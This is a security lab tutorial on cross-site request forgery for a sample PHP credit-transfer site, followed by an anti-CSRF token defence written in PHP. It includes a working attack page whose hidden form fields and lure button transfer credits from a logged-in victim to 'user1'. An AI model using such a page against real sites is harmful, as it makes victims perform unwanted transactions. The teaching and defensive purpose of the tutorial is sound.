  1. Creating an Account:
    • Navigate to the "Register" section.
    • Enter a unique username.
    • Enter a password.
    • Click on the "Register" button.
    • If successful, you will see a message saying "Registration successful!".
  2. Logging In:
    • Navigate to the "Login" section.
    • Enter the username and password you registered with.
    • Click on the "Login" button.
    • If successful, you will see options for transferring credits and your current credit balance.
  3. Creating a CSRF PoC: CSRF is a type of attack where an attacker tricks a victim into performing an unwanted action on a website where they're authenticated, usually without the victim's knowledge or consent. In this exercise, we'll demonstrate a simple CSRF attack by creating a form that can transfer credits from a logged-in user's account to another user without their knowledge.
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>CSRF PoC</title>
    </head>
    <body>
        <h2>CSRF Attack Example</h2>
        <p>This page is crafted by an attacker to demonstrate a CSRF vulnerability. In a real-world scenario, a victim would be lured to this page while logged into the target website.</p>
        <!-- The hidden fields mirror the transfer form's own "receiver" and "amount" fields.
             The browser attaches the victim's session cookie, and the form carries no anti-CSRF token. -->
        <form action="TARGET_URL" method="post">
            <input type="hidden" name="receiver" value="user1">
            <input type="hidden" name="amount" value="100">
            <input type="submit" value="Click me for a surprise!">
        </form>
    </body>
    </html>
    • Create an HTML page with the necessary form.
    • Replace `TARGET_URL` with the URL where the original PHP page is hosted.
    • When a logged-in user visits this crafted page and clicks on the provided button, credits will be transferred without their direct consent.
  4. Testing the CSRF PoC:
    • Log in to the original PHP website with any user account (e.g., user2).
    • Visit the crafted CSRF PoC HTML page you created.
    • Click on the provided button.
    • Go back to the original PHP website and check the credits of the logged-in user and `user1`. You should notice that credits have been transferred.
  5. Protecting Against CSRF: Implementing anti-CSRF tokens is a common measure to prevent CSRF attacks. With this mechanism, every form submission requires a unique token. Without the correct token, the server will reject the request.
    • Generate a unique token for every form displayed to the user.
    • Store this token in the user's session and also send it as a hidden field in the form.
    • On form submission, compare the token from the form with the one in the user's session. If they match, process the request. If not, reject it.
    • This ensures that only forms generated by your website can be used to submit data, preventing attackers from creating malicious forms to exploit CSRF vulnerabilities.
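    A PHP implementation of the four steps above, added here as an example rather than taken from the lab's own code: it assumes the transfer form posts the "receiver" and "amount" fields from step 3 to this same script, and transferCredits() is a hypothetical name for the lab's existing transfer routine.

```php
<?php
// Added example (not the lab's own code): anti-CSRF token for the credit-transfer form.
// Assumes the transfer form posts "receiver" and "amount" to this script and that the
// lab's existing transfer routine is named transferCredits() (hypothetical name).
session_start();

// Steps 1 and 2: a fresh, unpredictable token for every form displayed, kept in the session.
function newCsrfToken(): string
{
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    return $_SESSION['csrf_token'];
}

// Step 3: compare the submitted token with the session copy (constant-time compare),
// then discard it so a token can be used at most once.
function consumeCsrfToken(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? null;
    unset($_SESSION['csrf_token']);
    return is_string($submitted) && is_string($expected) && hash_equals($expected, $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (!consumeCsrfToken($_POST['csrf_token'] ?? null)) {
        // A form hosted on another site cannot know the session token, so it ends up here.
        http_response_code(403);
        exit('Invalid CSRF token');
    }
    // Token matched: the request came from a form this site rendered, so process it.
    // transferCredits($_SESSION['username'], $_POST['receiver'], (int) $_POST['amount']);
}

// Step 2 (second half): render the form with the token as a hidden field.
$token = htmlspecialchars(newCsrfToken(), ENT_QUOTES, 'UTF-8');
?>
<form action="" method="post">
    <input type="hidden" name="csrf_token" value="<?= $token ?>">
    <input type="text" name="receiver" placeholder="Receiver">
    <input type="number" name="amount" placeholder="Amount">
    <input type="submit" value="Transfer">
</form>
```

    Because the token is regenerated on every render, an older copy of the form (for example in a second browser tab) is rejected; a single per-session token is the usual relaxation if that matters for your application.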
Users and Credits

Username  Credits
user1     5000
user2     4500
user3     4000